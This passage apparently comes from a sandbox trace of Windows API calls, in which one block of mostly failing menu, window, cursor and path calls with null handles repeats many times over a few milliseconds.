MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.549] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.549] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.549] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.549] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.550] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.550] GetStockObject (i=6) returned 0x1b00018 [0027.550] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.550] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.550] PathFileExistsW (pszPath=0x0) returned 0 [0027.550] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.550] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.550] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.550] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.550] GetMenu (hWnd=0x0) returned 0x0 [0027.550] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.550] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.550] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.550] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.550] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.550] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.550] GetStockObject (i=6) returned 0x1b00018 [0027.550] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.550] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.550] PathFileExistsW (pszPath=0x0) returned 0 [0027.550] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.550] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.550] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.550] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.550] GetMenu (hWnd=0x0) returned 0x0 [0027.550] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.550] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.550] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.550] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.550] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.550] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.550] GetStockObject (i=6) returned 0x1b00018 [0027.550] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.551] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.551] PathFileExistsW (pszPath=0x0) returned 0 [0027.551] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.551] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.551] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.551] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.551] GetMenu (hWnd=0x0) returned 0x0 [0027.551] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3d8) returned -1 [0027.551] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.551] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.551] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.551] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.551] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.551] GetStockObject (i=6) returned 0x1b00018 [0027.551] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.551] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.551] PathFileExistsW (pszPath=0x0) returned 0 [0027.551] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.551] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.551] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.551] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.551] GetMenu (hWnd=0x0) returned 0x0 [0027.551] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.551] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.551] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.551] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.551] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.551] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.551] GetStockObject (i=6) returned 0x1b00018 [0027.551] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.551] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.551] PathFileExistsW (pszPath=0x0) returned 0 [0027.551] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.552] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.552] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.552] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.552] GetMenu (hWnd=0x0) returned 0x0 [0027.552] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.552] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.552] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.552] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.552] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.552] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.552] GetStockObject (i=6) returned 0x1b00018 [0027.552] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.552] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.552] PathFileExistsW (pszPath=0x0) returned 0 [0027.552] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.552] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.552] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.552] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.552] GetMenu (hWnd=0x0) returned 0x0 [0027.552] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.552] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.552] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.552] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.552] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.552] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.552] GetStockObject (i=6) returned 0x1b00018 [0027.552] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.552] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.552] PathFileExistsW (pszPath=0x0) returned 0 [0027.552] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.552] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.552] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.552] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.553] GetMenu (hWnd=0x0) returned 0x0 [0027.553] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.553] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.553] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.553] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.553] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.553] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.553] GetStockObject (i=6) returned 0x1b00018 [0027.553] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.553] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.553] PathFileExistsW (pszPath=0x0) returned 0 [0027.553] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.553] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.553] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.553] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.553] GetMenu (hWnd=0x0) returned 0x0 [0027.553] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x26) returned -1 [0027.553] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.553] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.553] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.553] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.553] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.553] GetStockObject (i=6) returned 0x1b00018 [0027.553] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.553] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.553] PathFileExistsW (pszPath=0x0) returned 0 [0027.553] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.553] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.553] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.553] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.553] GetMenu (hWnd=0x0) returned 0x0 [0027.553] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.553] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.553] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.554] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.554] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.554] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.554] GetStockObject (i=6) returned 0x1b00018 [0027.554] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.554] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.554] PathFileExistsW (pszPath=0x0) returned 0 [0027.554] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.554] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.554] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.554] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.554] GetMenu (hWnd=0x0) returned 0x0 [0027.554] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.554] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.554] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.554] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.554] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.554] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.554] GetStockObject (i=6) returned 0x1b00018 [0027.554] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.554] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.554] PathFileExistsW (pszPath=0x0) returned 0 [0027.554] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.554] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.554] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.554] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.554] GetMenu (hWnd=0x0) returned 0x0 [0027.554] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.554] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.554] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.554] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.554] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.554] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.555] GetStockObject (i=6) returned 0x1b00018 [0027.555] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.555] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.555] PathFileExistsW (pszPath=0x0) returned 0 [0027.555] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.555] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.555] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.555] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.555] GetMenu (hWnd=0x0) returned 0x0 [0027.555] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.555] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.555] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.555] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.555] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.555] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.555] GetStockObject (i=6) returned 0x1b00018 [0027.555] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.555] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.555] PathFileExistsW (pszPath=0x0) returned 0 [0027.555] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.555] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.555] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.555] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.555] GetMenu (hWnd=0x0) returned 0x0 [0027.555] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x111) returned -1 [0027.555] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.555] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.555] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.555] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.555] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.555] GetStockObject (i=6) returned 0x1b00018 [0027.555] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.555] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.555] PathFileExistsW (pszPath=0x0) returned 0 [0027.556] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.556] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.556] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.556] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.556] GetMenu (hWnd=0x0) returned 0x0 [0027.556] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.556] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.556] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.556] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.556] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.556] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.556] GetStockObject (i=6) returned 0x1b00018 [0027.556] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.556] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.556] PathFileExistsW (pszPath=0x0) returned 0 [0027.556] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.556] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.556] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.556] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.556] GetMenu (hWnd=0x0) returned 0x0 [0027.556] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.556] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.556] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.556] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.556] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.556] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.556] GetStockObject (i=6) returned 0x1b00018 [0027.556] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.556] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.556] PathFileExistsW (pszPath=0x0) returned 0 [0027.556] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.556] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.556] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.557] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.557] GetMenu (hWnd=0x0) returned 0x0 [0027.557] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.557] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.557] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.557] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.557] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.557] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.557] GetStockObject (i=6) returned 0x1b00018 [0027.557] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.557] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.557] PathFileExistsW (pszPath=0x0) returned 0 [0027.557] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.557] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.557] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.557] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.557] GetMenu (hWnd=0x0) returned 0x0 [0027.557] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.557] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.557] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.557] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.557] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.557] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.557] GetStockObject (i=6) returned 0x1b00018 [0027.557] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.557] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.557] PathFileExistsW (pszPath=0x0) returned 0 [0027.557] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.557] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.557] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.557] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.557] GetMenu (hWnd=0x0) returned 0x0 [0027.557] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x50d) returned -1 [0027.558] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.558] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.558] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.558] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.558] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.558] GetStockObject (i=6) returned 0x1b00018 [0027.558] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.558] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.558] PathFileExistsW (pszPath=0x0) returned 0 [0027.558] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.558] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.558] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.558] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.558] GetMenu (hWnd=0x0) returned 0x0 [0027.558] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.558] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.558] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.558] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.558] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.558] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.558] GetStockObject (i=6) returned 0x1b00018 [0027.559] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.559] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.559] PathFileExistsW (pszPath=0x0) returned 0 [0027.559] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.559] GetCursorPos (in: lpPoint=0x18f5e4 | out: 